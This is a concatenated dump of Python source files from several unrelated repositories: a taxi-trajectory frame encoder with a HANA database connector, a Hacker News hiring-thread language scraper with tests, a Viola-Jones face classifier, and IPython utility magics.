# Flush pending samples
if len(samples_in_frame) > 0:
previous_frame = frames[-1] if len(frames) > 0 else samples_in_frame[0].to_frame()
following_frame = samples_in_frame[-1].to_frame()
selected_sample = sample_with_highest_sed(samples_in_frame, previous_frame, following_frame)
frames.append(selected_sample.to_frame())
return frames
def create_frame_groups(trajectory_id, frames):
groups = group_frames(frames, 30)
frame_groups = []
for (group_id, trip_id, occupancy), frames in groups.items():
padded_frames = add_padding(frames, 30)
i_frame = None
p_frames = []
if len(padded_frames) > 0:
i_frame = padded_frames[0]
if len(padded_frames) > 1:
p_frames = [delta_encode(i_frame, frame) for frame in padded_frames[1:len(padded_frames)]]
frame_groups.append(FrameGroup(trajectory_id, group_id, trip_id, occupancy, i_frame, p_frames))
return frame_groups
def run_requests(begin_frame, begin_end, trajectory_id=None):
with HanaConnection() as connection:
connection.execute(trajectories_in_group_range(begin_frame, begin_end, trajectory_id))
return connection.fetchall()
if __name__ == '__main__':
# run_requests(0, 1)
run()
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,136 | VolkerSchiewe/tuk_3 | refs/heads/master | /utils/hana_connector.py | import pyhdb
import socket
import logging
import os
SCHEMA = 'TAXI'
class HanaConnection(object):
def __init__(self):
hana_user = os.environ.get('HANA_USER')
hana_pwd = os.environ.get('HANA_PWD')
if not hana_pwd and not hana_user:
raise EnvironmentError('Please provide user and password as environment variables (HANA_USER, HANA_PWD)!')
try:
self.connection = pyhdb.Connection(
host="side.eaalab.hpi.uni-potsdam.de",
port=30015,
user=hana_user,
password=hana_pwd,
autocommit=True,
timeout=None
)
self.connection.connect()
self.cursor = self.connection.cursor()
self.cursor.execute('SET SCHEMA {}'.format(SCHEMA))
except socket.gaierror as e:
logging.error('Database instance is not available!')
raise e
def __enter__(self):
return self.cursor
def __exit__(self, exc_type, exc_value, traceback):
if exc_type is not None:
logging.error(exc_type, exc_value, traceback)
self.cursor.close()
self.connection.close()
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,137 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/models/sample.py | import datetime
from frame.models.frame import Frame
class Sample:
def __init__(self, timestamp: datetime.datetime, x: float, y: float, speed: int, occupancy: int):
self.timestamp = timestamp
self.x = x
self.y = y
self.speed = speed
self.occupancy = occupancy
@classmethod
def from_row(cls, row):
return Sample(row[1], row[2], row[3], row[5], row[4])
def to_frame(self):
return Frame(self.frame_id(), self.x, self.y, self.occupancy)
def frame_id(self):
return self.timestamp.hour * 120 + self.timestamp.minute * 2 + int(self.timestamp.second / 30)
def __eq__(self, other):
"""Overrides the default implementation"""
if isinstance(self, other.__class__):
return self.__dict__ == other.__dict__
return False
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,138 | VolkerSchiewe/tuk_3 | refs/heads/master | /frame/sample_utils.py | import numpy as np
def sample_with_highest_sed(samples, previous_frame, following_frame):
time_in_frame = [sample.timestamp.second for sample in samples]
predicted_longitudes = np.interp(time_in_frame, (0, 15), (previous_frame.x, following_frame.x))
predicted_latitudes = np.interp(time_in_frame, (0, 15), (previous_frame.y, following_frame.y))
highest_sed = -1
highest_sed_sample = None
for i, sample in enumerate(samples):
sed = _euclidean_distance(predicted_latitudes[i], predicted_longitudes[i], sample.x, sample.y)
if sed > highest_sed:
highest_sed = sed
highest_sed_sample = sample
return highest_sed_sample
def _euclidean_distance(px, py, qx, qy):
return np.sqrt(np.square(qx - px) + np.square(qy - py))
| {"/frame/test/test_sample.py": ["/frame/models/sample.py"], "/frame/sql/get_trajectories_shark.py": ["/consts.py"], "/frame/sql/create_table.py": ["/consts.py"], "/frame/test/test_main.py": ["/frame/__main__.py", "/frame/frame_utils.py", "/frame/models/frame.py", "/frame/models/frame_group.py"], "/frame/sql_utils.py": ["/frame/sql/create_table.py", "/frame/sql/frame_group.py"], "/frame/frame_utils.py": ["/frame/models/frame.py"], "/frame/test/test_sample_utils.py": ["/frame/models/sample.py", "/frame/sample_utils.py"], "/frame/sql/frame_group.py": ["/consts.py", "/frame/models/frame_group.py"], "/frame/models/frame_group.py": ["/frame/models/frame.py"], "/frame/test/test_frame_utils.py": ["/frame/frame_utils.py", "/frame/models/frame.py"], "/frame/__main__.py": ["/frame/frame_utils.py", "/frame/models/frame_group.py", "/frame/models/sample.py", "/frame/sample_utils.py", "/frame/sql/get_trajectories_shark.py", "/frame/sql_utils.py", "/frame/tracker.py", "/utils/hana_connector.py"], "/frame/models/sample.py": ["/frame/models/frame.py"]} |
78,139 | shun-liang/hnhiringtrend | refs/heads/master | /main.py | import json
import pandas as pd
import re
from concurrent.futures import ThreadPoolExecutor
from datetime import datetime
import requests
from bs4 import BeautifulSoup
THREAD_POOL_SIZE = 15
with open('skills.json') as SKILLS_FILE:
SKILLS_JSON = json.load(SKILLS_FILE)
SINGLE_WORD_LANGUAGES = SKILLS_JSON['single_word_languages']
MULTIPLE_WORD_LANGUAGES = SKILLS_JSON['multiple_word_languages']
ALIASES = SKILLS_JSON['aliases']
try:
with open('language_matches.json', 'r+') as language_matches_file:
UNIX_TIME_TO_PROGRAMMING_LANGUAGES_DICT = json.load(language_matches_file)
except FileNotFoundError:
UNIX_TIME_TO_PROGRAMMING_LANGUAGES_DICT = {}
try:
with open('checked_posts.json', 'r+') as checked_posts_file:
checked_posts = set(json.load(checked_posts_file)['checked_posts'])
except FileNotFoundError:
checked_posts = set({})
try:
with open('total_posts.json', 'r+') as total_posts_file:
total_posts = json.load(total_posts_file)['total_posts']
total_posts_json = {'total_posts': total_posts}
except FileNotFoundError:
total_posts = {}
total_posts_json = {'total_posts': total_posts}
with open('posts.json') as posts_file:
POSTS_JSON = json.load(posts_file)
JOB_POST_POINTERS = POSTS_JSON['pointers']
NON_JOB_POSTS = POSTS_JSON['non_job_post']
SPLIT_PATTERN = r'[\w\'\|\-\+#&’]+'
URL_PATTERN = r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
EMAIL_PATTERN = r'[\w.-]+@[\w.-]+'
def scrape_jobs(root_post_id):
if str(root_post_id) in JOB_POST_POINTERS:
root_post_id = JOB_POST_POINTERS[str(root_post_id)]
if root_post_id in NON_JOB_POSTS:
print('%s is not a job post' % root_post_id)
return None
if root_post_id in checked_posts:
print('post %s already scraped' % root_post_id)
return None
root_post_request = requests.get('https://hacker-news.firebaseio.com/v0/item/%s.json' %
str(root_post_id))
root_post_json = root_post_request.json()
if 'time' not in root_post_json:
print('time attribute not in post %s' % root_post_id)
return None
unix_time = root_post_json['time']
unix_time_str = str(unix_time)
post_datetime = datetime.fromtimestamp(unix_time)
if 'title' in root_post_json:
root_post_title = root_post_json['title']
if "hiring" in root_post_title.lower():
print('%s: %s' % (root_post_title, root_post_request.url))
job_post_ids = root_post_json['kids']
total_posts[unix_time_str] = len(job_post_ids)
futures = []
executor = ThreadPoolExecutor(max_workers=THREAD_POOL_SIZE)
if unix_time_str in UNIX_TIME_TO_PROGRAMMING_LANGUAGES_DICT:
programming_languages_dict = UNIX_TIME_TO_PROGRAMMING_LANGUAGES_DICT[unix_time_str]
else:
programming_languages_dict = {lang: [] for lang in
SINGLE_WORD_LANGUAGES + MULTIPLE_WORD_LANGUAGES}
UNIX_TIME_TO_PROGRAMMING_LANGUAGES_DICT[unix_time_str] = programming_languages_dict
existing_posts = frozenset([post for posts in programming_languages_dict.values() for post in posts])
for job_post_id in job_post_ids:
if job_post_id not in existing_posts:
task_future = executor.submit(_fetch_and_analyze, job_post_id, programming_languages_dict)
futures.append(task_future)
#else:
# print('job post %s already scraped.' % job_post_id)
for task_future in futures:
task_future.result()
else:
print('Can\'t get attribute \'title\' from root post %s' % root_post_request.url)
now = datetime.now()
if post_datetime.month != now.month or post_datetime.year != now.year:
checked_posts.add(root_post_id)
def show_jobs(job_post_id_list):
for job_post_id in job_post_id_list:
print(_get_job_post_text(job_post_id))
def main():
for root_post in get_all_whoishring_root_posts():
scrape_jobs(root_post)
with open('language_matches.json', 'w') as language_matches_file:
json.dump(UNIX_TIME_TO_PROGRAMMING_LANGUAGES_DICT, language_matches_file, indent=2)
with open('language_matches.jsonp', 'w') as language_matches_jsonp_file:
language_matches_jsonp_file.write('var languages_matches = %s' % json.dumps(UNIX_TIME_TO_PROGRAMMING_LANGUAGES_DICT))
with open('checked_posts.json', 'w') as checked_posts_json_file:
checked_posts_json = {'checked_posts': list(checked_posts)}
json.dump(checked_posts_json, checked_posts_json_file, indent=2)
with open('total_posts.json', 'w') as total_posts_json_file:
json.dump(total_posts_json, total_posts_json_file, indent=2)
with open('total_posts.jsonp', 'w') as total_posts_jsonp_file:
total_posts_jsonp_file.write('var total_posts = %s' % json.dumps(total_posts_json))
def get_all_whoishring_root_posts():
user_request = requests.get('https://hacker-news.firebaseio.com/v0/user/whoishiring.json')
if user_request.status_code == 200:
root_posts = user_request.json()['submitted']
user_request = requests.get('https://hacker-news.firebaseio.com/v0/user/_whoishiring.json')
if user_request.status_code == 200:
root_posts += user_request.json()['submitted']
print('root_posts: %s' % root_posts)
return root_posts
def reduce_all_language_matches():
reduced_dict = {lang: [] for lang in SINGLE_WORD_LANGUAGES + MULTIPLE_WORD_LANGUAGES}
for unix_time in UNIX_TIME_TO_PROGRAMMING_LANGUAGES_DICT:
language_dict = UNIX_TIME_TO_PROGRAMMING_LANGUAGES_DICT[unix_time]
for lang in language_dict:
reduced_dict[lang] += language_dict[lang]
return reduced_dict
def _get_job_post_text(job_post_id):
job_post_request = requests.get('https://hacker-news.firebaseio.com/v0/item/%s.json' %
job_post_id)
if job_post_request.status_code == 200:
job_post_json = job_post_request.json()
if job_post_json:
if 'text' in job_post_json:
return job_post_json['text']
else:
return None
else:
print('Can\'t get json of job post %s, job_post_json is null' % job_post_id)
return None
else:
print('Can\'t retrive job post %s, HTTP response code: %s' %
(job_post_id, job_post_request.status_code))
return None
def _fetch_and_analyze(job_post_id, programming_languages_dict):
job_post_text = _get_job_post_text(job_post_id)
if job_post_text:
job_post_text = BeautifulSoup(job_post_text, 'html.parser').get_text(separator=' ')
job_post_text = re.sub('%s|%s' % (URL_PATTERN, EMAIL_PATTERN), '', job_post_text)
words = re.findall(SPLIT_PATTERN, job_post_text)
single_word_languages_set = set({})
multiple_word_languages_set = set({})
for word in words:
if word in SINGLE_WORD_LANGUAGES:
single_word_languages_set.add(word)
if word in ALIASES:
single_word_languages_set.add(ALIASES[word])
for lang in MULTIPLE_WORD_LANGUAGES:
if lang in job_post_text:
multiple_word_languages_set.add(lang)
for lang in single_word_languages_set |\
multiple_word_languages_set:
programming_languages_dict[lang].append(job_post_id)
if __name__ == '__main__':
main()
| {"/hn_posts/test_job_post.py": ["/hn_posts/job_post.py"]} |
78,140 | shun-liang/hnhiringtrend | refs/heads/master | /hn_posts/test_job_post.py | import json
from .job_post import JobPost
class TestJobPost(object):
'''Unit test for JobPost class
'''
example_text_single_word = '''
Redwood City
Numenta (http://www.numenta.com) is developing technology modeled on the neocortex. Get in on the ground floor of what, we think, is already groundbreaking
machine intelligence.
Senior devs with a passion for stellar, simple, usable design wanted. Experience with Python would be great but if you bring a deep skillset in a web stack
of your choice then our team is always open to new ideas!
Numenta is prepared to take on the world, and has the technology and experienced leadership to do it.
Apply here (resume-eng at numenta dot com) or contact me through info in my profile for questions.
P.S. Paid intern opportunities for the fall are open as well!
Other keywords for page searchers: AI, Machine learning, front-end
'''
example_text_alias = '''
Palo Alto, CA; Washington, DC (full-time preferred, part-time possible if you're an expert)
REMOTE ONLY for now, but it'd be great if you were local -- we're building out a long-term team and will be setting up an office in the coming months.
I'm with a 5-person team working on a real-time web + mobile application. We just finished a prototype, raised some seed money, and are headed for
greatness. Hopefully. This is a chance to work on some architecture from the outset of the product. I'd prefer those who have a possibility of coming on
long-term as I build out the team, most likely around Palo Alto, but do have immediate needs that lead me to consider splitting up short-term chunks of
development for freelancers. In any case, we're distributed for now so remote is the only possibility.
backend: postgres, python, django, gevent + gunicorn
frontend: coffeescript, jQuery, backbone.js, socket.io, modernizr, compass
I'm looking for:
1. Advanced web jacks-of-many-trades. You know a lot about several things from above and have at least tried your hand at a demo app using the rest.
Backend/frontend/deployment.
2. A specialized front-end dev who knows their javascript in-and-out. We're designing a single page architecture for the most part. Mobile browser
experience would be good.
3. Mobile app developers (native iPhone & Android, though we're considering phonegap as well to get something out there faster).
We're staying distributed for now -- I'm based in Palo Alto but spend a fair amount of time with some of the team in DC as well.
gmail - davidmarble
'''
def test_match_programming_language(self):
with open('./skills.json') as SKILLS_FILE:
SKILLS_JSON = json.load(SKILLS_FILE)
SINGLE_WORD_LANGUAGES = SKILLS_JSON['single_word_languages']
MULTIPLE_WORD_LANGUAGES = SKILLS_JSON['multiple_word_languages']
ALIASES = SKILLS_JSON['aliases']
job_post = JobPost(self.example_text_single_word)
job_post.match_single_word_languages(SINGLE_WORD_LANGUAGES)
assert 'Python' in job_post.matched_languages
assert 'C++' not in job_post.matched_languages
| {"/hn_posts/test_job_post.py": ["/hn_posts/job_post.py"]} |
78,141 | shun-liang/hnhiringtrend | refs/heads/master | /hn_posts/job_post.py | import re
class JobPost(object):
''' A job post scraped from Hacker News
'''
SPLIT_PATTERN = r'[\w\'\|\-\+#&’]+'
def __init__(self, text):
self.text = text
self.words = []
if text:
self.words = re.findall(self.SPLIT_PATTERN, text)
self.matched_languages = set({})
def match_single_word_languages(self, langs):
for word in self.words:
if word in langs:
self.matched_languages.add(word)
| {"/hn_posts/test_job_post.py": ["/hn_posts/job_post.py"]} |
78,142 | ynsa/face_detector | refs/heads/master | /applicator.py | #!/usr/bin/env python3
import pickle
import warnings
import numpy as np
from sklearn.externals._pilutil import imread
import sys
from learner import generate_vj_features, WeakClassifier
warnings.filterwarnings('ignore')
def read_file(fname):
image = imread(fname)
assert image.shape == (26, 40, 3)
return image[:,:,0]
def load_model(model_file):
with open(model_file, 'rb') as f:
model = pickle.load(f)
return model
def predict(model, features):
pred = 0
for h_, a in model:
pred += a * h_.predict(features[h_.i])
return int(np.sign(pred))
def main(fname, model_file='my.model'):
integral_img = read_file(fname)
features = generate_vj_features(integral_img)
model = load_model(model_file)
class_ = predict(model, features)
print(int(class_ == 1))
model = sys.argv[-2]
fname = sys.argv[-1]
main(fname, model)
| {"/applicator.py": ["/learner.py"]} |
78,143 | ynsa/face_detector | refs/heads/master | /learner.py | import math
import os
import pickle
import sys
import timeit
import warnings
import numpy as np
from sklearn.externals._pilutil import imread
warnings.filterwarnings('ignore')
def integral_image(image, h=26, w=40):
integral_img = np.zeros((h + 1, w + 1))
integral_img[1:, 1:] = image.copy()
for i in range(1, h):
for j in range(1, w):
integral_img[i][j] = integral_img[i][j] \
- integral_img[i - 1][j - 1] \
+ integral_img[i][j - 1] \
+ integral_img[i - 1][j]
return integral_img[1:, 1:]
def read_file(filename) -> np.array:
image = np.array(imread(filename))
assert image.shape == (26, 40, 3)
image = image[:, :, 0]
integral_img = integral_image(image)
assert integral_img.shape == (26, 40)
images = [image]
# change images to get more samples
flipped_image = np.fliplr(image)
images.append(integral_image(flipped_image))
flipped_image_tr = np.flipud(image)
images.append(integral_image(flipped_image_tr))
return images
def get_s(folder):
base_n = 0
y = []
features = []
flipped_y = []
flipped_features = []
for filename in os.listdir(os.path.join(folder, 'cars')):
name = os.path.join(folder, 'cars', filename)
integral_img, *flipped = read_file(name)
y.append(-1)
features.append(generate_vj_features(integral_img))
for fl in flipped:
flipped_y.append(-1)
flipped_features.append(generate_vj_features(fl))
base_n += 1
for filename in os.listdir(os.path.join(folder, 'faces')):
name = os.path.join(folder, 'faces', filename)
integral_img, *flipped = read_file(name)
y.append(1)
features.append(generate_vj_features(integral_img))
for fl in flipped:
flipped_y.append(1)
flipped_features.append(generate_vj_features(fl))
base_n += 1
y.extend(flipped_y)
features.extend(flipped_features)
return base_n, y, features
def generate_vj_features(integral_img):
def calc_rect(x: int, y: int, w: int, h: int):
return integral_img[x + w][y + h] + integral_img[x][y] \
- integral_img[x + w][y] - integral_img[x][y + h]
max_w, max_h = integral_img.shape
features = []
for w in range(5, max_w+1):
for h in range(5, max_h+1):
for i in range(0, max_w-w, 10):
for j in range(0, max_h-h, 10):
initial = calc_rect(i, j, w, h)
if i + 2*w < max_w:
initial_right = calc_rect(i+w, j, w, h)
features.append([[initial], [initial_right]])
if j + 2*h < max_h:
initial_bottom = calc_rect(i, j+h, w, h)
features.append([[initial], [initial_bottom]])
if i + 3*w < max_w:
initial_right_second = calc_rect(i+2*w, j, w, h)
features.append(
[[initial, initial_right_second], [initial_right]])
if i+2*w < max_w and j+2*h < max_h:
initial_right_bottom = calc_rect(i+w, j+h, w, h)
features.append(
[[initial_right, initial_bottom],
[initial, initial_right_bottom]]
)
final_features = np.zeros(len(features))
for i, feature in enumerate(features):
final_features[i] = sum(feature[0]) - sum(feature[1])
return final_features
class WeakClassifier:
def __init__(self, threshold: int, class_: int, i: int = None, error=None):
self.threshold = threshold
self.class_ = class_
self.error = error
self.i = i
def predict(self, x):
return self.class_ if x < self.threshold else -self.class_
def calculate_error(self, x, y):
self.error = len([1 for i in range(len(x)) if self.predict(x[i]) != y[i]]) \
/ len(x)
return self.error
def generate_classifier(features, y, weights, total_pos, total_neg):
min_threshold = None
min_error = float('inf')
min_class = None
current_pos = 0
current_neg = 0
s = sorted(zip(weights, features, y), key=lambda x: x[1])
for i, (w, value, y_) in enumerate(s):
err_pos = total_pos - current_pos + current_neg
err_neg = total_neg - current_neg + current_pos
error = min(err_pos, err_neg)
if error < min_error:
min_error = error
min_threshold = value
min_class = 1 if err_pos < err_neg else -1
if y_ == 1:
current_pos += w
else:
current_neg += w
return WeakClassifier(min_threshold, min_class, error=min_error)
def find_weak(features, y, weights):
min_error = np.inf
min_classifier = None
total_pos = sum([weights[i] for i in range(len(y)) if y[i] == 1])
total_neg = sum(weights) - total_pos
for i in range(min(5000, len(features))):
classifier = generate_classifier(features[i], y, weights, total_pos, total_neg)
classifier.i = i
if classifier.error < min_error:
min_error = classifier.error
min_classifier = classifier
return min_classifier
def learn(y, features, start, base_n):
n = len(y)
weights = [1 / n] * n
hs = []
alphas = []
base_accuracy = 0
t = 0
while base_accuracy < 0.98:
h = find_weak(features, y, weights)
alpha = 0.5 * math.log((1 - h.error) / h.error)
z = 2 * math.sqrt(h.error * (1 - h.error))
for i in range(len(weights)):
weights[i] *= math.exp(-alpha * y[i] * h.predict(features[h.i][i])) / z
hs.append(h)
alphas.append(alpha)
base_accuracy = 0
accuracy = 0
for i, y_ in enumerate(y[:base_n]):
pred = 0
for a, h_ in zip(alphas, hs):
pred += a * h_.predict(features[h_.i][i])
class_ = np.sign(pred)
if class_ == y_:
accuracy += 1
if i == base_n - 1:
base_accuracy = accuracy
base_accuracy /= base_n * 1.0
accuracy /= n * 1.0
t += 1
# print(f'[{t}] accuracy: {accuracy:.3f}\t'
# f'base_acciracy: {base_accuracy:.3f}\t'
# f'time: {timeit.default_timer() - start:.2f}s')
return hs, alphas
def save_model(hs, alphas, file):
with open(file, 'wb') as f:
pickle.dump(list(zip(hs, alphas)), f)
def main(model_file, folder='train'):
start = timeit.default_timer()
base_n, y, features = get_s(folder)
features = np.transpose(features)
hs, alphas = learn(y, features, start, base_n)
save_model(hs, alphas, model_file)
assert timeit.default_timer() - start < 600
folder = sys.argv[-2]
model = sys.argv[-1]
main(model, folder)
| {"/applicator.py": ["/learner.py"]} |
78,145 | hdmamin/htools | refs/heads/master | /htools/magics.py | import inspect
from IPython.core.interactiveshell import InteractiveShell
from IPython.core.magic import cell_magic, magics_class, Magics
from IPython.core.magic_arguments import (argument, magic_arguments,
parse_argstring)
import warnings
from htools.meta import timebox
@magics_class
class InteractiveMagic(Magics):
@cell_magic
@magic_arguments()
@argument('-p', action='store_true',
help='Boolean flag. If passed, the change will apply for the '
'rest of the notebook, or until the user changes it again. '
'The default behavior is to apply the change only to the '
'current cell.')
def talk(self, line=None, cell=None):
"""When Jupyter notebook is in default mode where
ast_node_interactivity=last (i.e. only the last unprinted statement is
displayed), this will run the current cell while printing all
statements. It then resets the mode so future cells only print the last
statement again.
Examples
---------
In the example below, each cell contains two statements. Notice that
the cell containing the magic displays both lines of output, while the
other cells only display the last output.
>>> 5 + 10
>>> 6 + 11
17
%%talk
>>> 6 + 2
>>> 3 + 1
8
4
>>> 1 + 2
>>> 3 + 4
7
"""
self._adjust_verbosity(cell, 'all', parse_argstring(self.talk, line))
@cell_magic
@magic_arguments()
@argument('-p', action='store_true',
help='Boolean flag. If passed, the change will apply for the '
'rest of the notebook, or until the user changes it again. '
'The default behavior is to apply the change only to the '
'current cell.')
def hush(self, line=None, cell=None):
"""The reverse of the `talk` magic. When the notebook is in
ast_node_interactivty='all' mode, this can be used to suppress outputs
other than the last one for a single cell. Cells that follow will
return to the display mode set for the whole notebook.
Examples
---------
In the example below, each cell contains two statements. Notice that
the cell containing the magic only displays the last line of output,
while the other cells display both outputs.
>>> 5 + 10
>>> 6 + 11
15
17
%%hush
>>> 6 + 2
>>> 3 + 1
4
>>> 1 + 2
>>> 3 + 4
3
7
"""
self._adjust_verbosity(cell, 'last', parse_argstring(self.hush, line))
@cell_magic
@magic_arguments()
@argument('-p', action='store_true',
help='Boolean flag. If passed, the change will apply for the '
'rest of the notebook, or until the user changes it again. '
'The default behavior is to apply the change only to the '
'current cell.')
def mute(self, line=None, cell=None):
"""A more extreme version of the `hush` magic that suppresses all
output from a cell. Cells that follow will return to the default mode
of ast_node_interactivity='last' unless the -p flag (for persist) is
provided.
Examples
---------
In the example below, each cell contains two statements. Notice that
the cell containing the magic displays no output, while the other cells
display the final output.
>>> 5 + 10
>>> 6 + 11
17
%%mute
>>> 6 + 2
>>> 3 + 1
>>> 1 + 2
>>> 3 + 4
7
"""
self._adjust_verbosity(cell, 'none', parse_argstring(self.mute, line))
def _adjust_verbosity(self, cell, mode, args):
old_setting = InteractiveShell.ast_node_interactivity
InteractiveShell.ast_node_interactivity = mode
self.shell.run_cell(cell)
if not args.p:
InteractiveShell.ast_node_interactivity = old_setting
@magics_class
class WarningMagic(Magics):
@cell_magic
@magic_arguments()
@argument('-p', action='store_true', help='Boolean flag. If passed, the '
'change will apply for the rest of the notebook, or until the '
'user changes it again. The default behavior is to apply the '
'change only to the current cell.')
def lax(self, line, cell):
"""Silence warnings for a cell. The -p flag can be used to make the
change persist, at least until the user changes it again.
"""
args = parse_argstring(self.lax, line)
self._warn(cell, 'ignore', args.p)
@cell_magic
@magic_arguments()
@argument('-p', action='store_true', help='Boolean flag. If passed, the '
'change will apply for the rest of the notebook, or until the '
'user changes it again. The default behavior is to apply the '
'change only to the current cell.')
def nag(self, line, cell):
"""Silence warnings for a cell. The -p flag can be used to make the
change persist, at least until the user changes it again.
"""
args = parse_argstring(self.nag, line)
self._warn(cell, 'always', args.p)
def _warn(self, cell, mode, persist):
"""Base method for lax and nag. These could easily be handled in a
single method with optional flags, but I find the usage to be more
intuitive when the names are different, and generally prefer flag-free
magics since the goal is ease of use.
The persist flag is processed in the child methods because parsing
references the method that was called.
"""
warnings.filterwarnings(mode)
self.shell.run_cell(cell)
# Reset manually because warnings.resetwarnings() behaved erratically.
if not persist:
out_modes = {'ignore', 'always'}
out_modes.remove(mode)
warnings.filterwarnings(list(out_modes)[0])
@magics_class
class FunctionRacerMagic(Magics):
@cell_magic
@magic_arguments()
@argument('-n', help='Number of loops when timing functions (inner loop).')
@argument('-r', help='Number of runs when timing functions (outer loop).')
def race(self, line, cell):
"""Time 2 or more functions to allow the user to easily compare speeds.
Each line will be timed separately, so a function call cannot take up
multiple lines. This is essentially a convenient wrapper for the
%%timeit magic that ensures all functions are timed with the same
choice of parameters. (When timing each function separately, I found
that during the testing process I would often end up changing some
function or timeit parameters in one case but forget to change it for
another. This magic aims to prevent that situation.)
Examples
---------
Example 1: A fairly standard case where we time three possible
implementations of a function to see which is fastest.
%%race -n 10 -r 3
>>> tokenizer_v1(text)
>>> tokenizer_v2(text)
>>> tokenizer_v3(text)
Example 2: If a function requires many arguments or if parameter
names are long, consider passing in a list or dictionary of arguments.
%%race
>>> many_args_func_v1(**params)
>>> many_args_func_v2(**params)
"""
args = parse_argstring(self.race, line)
n = args.n or 5
r = args.r or 3
# Split cell into lines of code to execute.
rows = [row for row in cell.strip().split('\n')
if not row.startswith('#')]
prefix = f'%timeit -n {n} -r {r} '
for row in rows:
self.shell.run_cell(prefix + row)
@magics_class
class TimeboxMagic(Magics):
"""Timebox a cell's execution to a user-specified duration. As with any
standard try/except block, note that values can change during execution
even if an error is eventually thrown (i.e. no rollback occurs).
Sample usage:
%%timebox 3
# Throw error if cell takes longer than 3 seconds to execute.
output = slow_function(*args)
%%timebox 3 -p
# Attempt to execute cell for 3 seconds, then give up. Message is printed
# stating that time is exceeded but no error is thrown.
output = slow_function(*args)
"""
@cell_magic
@magic_arguments()
@argument('time', type=int,
help='Max number of seconds before throwing error.')
@argument('-p', action='store_true',
help='Boolean flag: if provided, use permissive '
'execution (if the cell exceeds the specified '
'time, no error will be thrown, meaning '
'following cells can still execute.) If '
'flag is not provided, default behavior is to '
'raise a TimeExceededError and halt notebook '
'execution.')
def timebox(self, line=None, cell=None):
args = parse_argstring(self.timebox, line)
if args.p: cell = self._make_cell_permissive(cell)
with timebox(args.time) as tb:
self.shell.run_cell(cell)
@staticmethod
def _make_cell_permissive(cell):
"""Place whole cell in try/except block. Built-in error handling in
timebox context manager doesn't work because ipython shell has
its own logic for error handling, so we need to do this messy string
manipulation.
"""
robust_cell = (
'try:\n\t' + cell.replace('\n', '\n\t')
+ '\nexcept:\n\tprint("Time exceeded. '
'\\nWarning: objects may have changed during execution.")'
)
return robust_cell
# Automatically register all magics defined in this module.
magics = (obj for obj in map(locals().get, dir())
if inspect.isclass(obj)
and obj.__name__ != 'Magics'
and issubclass(obj, Magics))
get_ipython().register_magics(*magics)
| {"/htools/magics.py": ["/htools/meta.py"], "/htools/meta.py": ["/htools/core.py", "/htools/config.py"], "/htools/__init__.py": ["/htools/core.py", "/htools/meta.py", "/htools/structures.py"], "/notebooks/scratch_trie_with_attrs.py": ["/htools/core.py"], "/htools/structures.py": ["/htools/core.py", "/htools/meta.py"], "/htools/core.py": ["/htools/config.py"], "/htools/cli.py": ["/htools/core.py", "/htools/meta.py"], "/htools/autodebug.py": ["/htools/meta.py"], "/htools/pd_tools.py": ["/htools/core.py", "/htools/__init__.py"]} |
78,146 | hdmamin/htools | refs/heads/master | /htools/meta.py | from abc import ABC, abstractmethod
import ast
from collections import ChainMap
from contextlib import contextmanager, redirect_stdout
from copy import copy, deepcopy
from functools import wraps, partial, update_wrapper
from fuzzywuzzy import fuzz, process
import importlib
import inspect
from inspect import Parameter, signature, _empty, getsource, ismethod
import io
import json
import logging
import os
from pathlib import Path
import pkgutil
